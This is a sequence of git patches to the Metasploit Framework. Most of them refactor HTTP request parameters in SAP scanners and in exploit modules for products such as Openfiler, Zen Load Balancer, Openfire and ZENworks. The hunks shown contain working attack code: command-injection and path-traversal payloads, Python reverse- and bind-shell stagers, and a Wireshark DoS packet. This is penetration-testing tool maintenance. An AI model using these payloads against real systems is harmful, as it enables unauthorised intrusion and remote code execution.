a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index f60e420352..d8f0f2ba23 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -70,17 +70,20 @@ class Metasploit4 < Msf::Auxiliary begin vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'") res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code == 200 if res.body =~ /<h1>Logon failed<\/h1>/ vprint_error("[SAP] #{ip}:#{rport} - Logon failed") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index bab5a4f4c7..33c040c8ac 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 977001c395..7b2aad3ebe 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 0677878b96..db2a26bf6e 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index d02719355c..4695780832 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code == 200 diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index b1542c492e..d979506f7a 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/admin/system.html?step=2&device=lo#{cmd}", - 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'uri' => '/admin/system.html', + 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'vars_get' => { + 'step' => '2', + 'device' => "lo#{cmd}" + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unknown, 'Connection failed') diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ffc6163100..3da916023f 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -100,9 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ @@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'change_password' + } }) if !passchange or passchange.code != 200 @@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote } login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ @@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending payload") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => post, + 'vars_get' => { + 'c' => 'netinterface', + } }) end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 96e02f8cbf..71901569d9 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] - auth = Rex::Text.encode_base64("#{user}:#{pass}") cmd = Rex::Text.uri_encode(";#{payload.encoded}&") lines = rand(100) + 1 @@ -96,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", - 'headers' => - { - 'Authorization' => "Basic #{auth}" - } + 'uri' => '/index.cgi', + 'authorization' => basic_auth(user, pass), + 'vars_get' => { + 'nlines' => lines, + 'action' => 'See logs', + 'id' => '2-2', + 'filelog' => cmd + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, 'Connection failed') diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 19c9a442ed..597af3a40a 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="), + 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'method' => 'POST', 'cookie' => @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'submit' => 'Sign+in' + }, + 'vars_get' => { + 'org.apache.catalina.filters.CSRF_NONCE' => '' } }) @@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote # def get_nonce res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"), - 'cookie' => @cookie + 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'typeId' => '10003' + } }) if not res or res.code != 200 diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index bc346979d8..874e681659 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'method' => 'POST', 'data' => data, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=' + boundary, - 'Content-Length' => data.length, - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=' + boundary, + 'Content-Length' => data.length, + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'uploadplugin' => nil + } }) @@ -199,11 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, - 'headers' => - { - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), + 'headers' => { + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'deleteplugin' => plugin_name.downcase + } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 9953aa07b0..70988f9cd5 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -64,15 +64,17 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi( { - 'uri' => '/robohelp/server?PUBLISH=' + uid, + 'uri' => '/robohelp/server', 'version' => '1.1', 'method' => 'POST', 'data' => file, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, - 'UID' => uid, - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, + 'UID' => uid, + }, + 'vars_get' => { + 'PUBLISH' => uid + } }, 5) if ( res and res.message =~ /OK/ ) @@ -80,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...") data = send_request_raw({ - 'uri' => '/robohelp/robo/reserved/web/' + id + '/' + page , + 'uri' => normalize_uri('robohelp', 'robo','reserved', 'web', id, page), 'method' => 'GET', - 'version' => '1.0', + 'version' => '1.0' }, 5) handler diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 7ddae4d011..63f07cc9c6 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -46,10 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(filename, contents) res = send_request_cgi({ - 'uri' => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#{filename}"), - 'method' => 'POST', - 'data' => contents, - 'ctype' => "text/html" + 'uri' => normalize_uri('agentLogUploader'), + 'method' => 'POST', + 'data' => contents, + 'ctype' => 'text/html', + 'vars_get' => { + 'computerName' => 'DesktopCentral', + 'domainName' => 'webapps', + 'customerId' => '..', + 'filename' => filename + } }) if res and res.code == 200 and res.body.to_s.empty? diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96f1cb3d2a..14471183de 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -83,9 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") send_request_cgi({ - 'uri' => "/OvCgi/ovalarm.exe?OVABverbose=1", + 'uri' => '/OvCgi/ovalarm.exe', 'method' => "GET", - 'headers' => { 'Accept-Language' => sploit } + 'headers' => { + 'Accept-Language' => sploit + }, + 'vars_get' => { + 'OVABverbose' => '1' + } }, 3) handler diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 730b89f9a9..0f6fa1e789 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -68,10 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, - 'method' => 'GET', - 'headers' => { - 'Accept' => '*/*', + 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), + 'method' => 'GET', + 'headers' => { + 'Accept' => '*/*', + }, + 'vars_get' => { + crash => nil } }, 5) diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 9d675fec6a..728544b5bc 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -66,16 +66,17 @@ class Metasploit3 < Msf::Exploit::Remote war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s - res = send_request_cgi( - { - 'uri' => "/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war", - 'method' => 'POST', - 'data' => war_data, - 'headers' => - { - 'Content-Type' => 'application/octet-stream', - } - }) + res = send_request_cgi({ + 'uri' => '/zenworks/UploadServlet', + 'method' => 'POST', + 'data' => war_data, + 'headers' => { + 'Content-Type' => 'application/octet-stream', + }, + 'vars_get' => { + 'filename' => "../../webapps/#{app_base}.war" + } + }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 64c917fea2..14f13a776d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -190,6 +190,8 @@ describe Rex::Proto::Http::ClientRequest do 'bar' => 'baz', 'frobnicate' => 'the froozle?', 'foshizzle' => 'my/nizzle', + 'asdf' => nil, + 'test' => '' } end @@ -217,6 +219,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the froozle?") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end @@ -229,6 +233,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end From b5c567c4628455a5f15c9eb24c224f0fd07c9f37 Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 14:03:45 -0500 Subject: [PATCH 379/853] Update bind_tcp.rb --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index cd9422023c..50e8974123 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "s.listen(1)\n" cmd += "c,a=s.accept()\n" From 77f66f8510fc62eb9e5f7a2e85417f7edc1b84ca Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Sun, 25 May 2014 14:04:54 -0500 Subject: [PATCH 380/853] Update reverse_tcp.rb --- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 765dc00f34..4f741f0c52 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "l=struct.unpack('>I',s.recv(4))[0]\n" cmd += "d=s.recv(4096)\n" From 77e70d8bbeee1f8199009c12a50f79a342d50311 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Sun, 25 May 2014 16:28:40 -0400 Subject: [PATCH 381/853] Add 2 more variables for meterpreter irb --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 6766ce7e7f..28138c8c25 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -314,6 +314,8 @@ class Console::CommandDispatcher::Core print_status("Starting IRB shell") print_status("The 'client' variable holds the meterpreter client\n") + session = client + framework = client.framework Rex::Ui::Text::IrbShell.new(binding).run end From d3c17d8e3e9f27305d3df838603e57df451e0107 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 25 May 2014 18:39:53 -0500 Subject: [PATCH 382/853] Delete wireshark_capwap_dos --- .../dos/wireshark/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb deleted file mode 100644 index 603f5e81ca..0000000000 --- a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb +++ /dev/null @@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 33ba1341474fed4cb31bbe0dc348c979dc3784d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 25 May 2014 18:52:01 -0500 Subject: [PATCH 383/853] Clean msftidy warnings and metadata --- modules/auxiliary/dos/wireshark/capwap.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 6555ab5dcf..c777d21b92 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -12,27 +12,28 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. + This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 + to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an + incomplete packet. }, 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Auxiliary msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + 'Laurent Butti', # Discovery vulnerability + 'j0sm1' # Auxiliary msf module ], 'References' => [ - [ 'CVE', '2013-4074'], + ['CVE', '2013-4074'], + ['OSVDB', '94091'], + ['BID', '60500'] ], 'DisclosureDate' => 'Apr 28 2014')) - # Protocol capwap needs port 5247 to trigger the dissector in wireshark register_options([ Opt::RPORT(5247) ], self.class) - end def run @@ -41,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # We send a packet incomplete to crash dissector print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") - # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then # the dissector crash # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 384/853] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? @@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 0133e861f84e8cea3f34cfdf38464990ff8dd14c Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Mon, 26 May 2014 23:55:20 -0500 Subject: [PATCH 385/853] Fix typo --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 4336909510..e2d425c6c9 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -115,7 +115,7 @@ class ClientRequest qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - # support get paraemter without value + # support get parameter without value # Example: uri?parameter if val val = val.to_s From ae1b7e564b1c30314add758ccea95e3abfd0079f Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Tue, 27 May 2014 05:18:00 -0500 Subject: [PATCH 386/853] Update powershell.rb --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index d063846d88..867772db1b 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -19,7 +19,7 @@ module Powershell # Returns true if powershell is installed # def have_powershell? - cmd_out = cmd_exec("echo. | powershell get-host") + cmd_out = cmd_exec("cmd.exe /c echo. | powershell get-host") return true if cmd_out =~ /Name.*Version.*InstanceId/m return false end From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 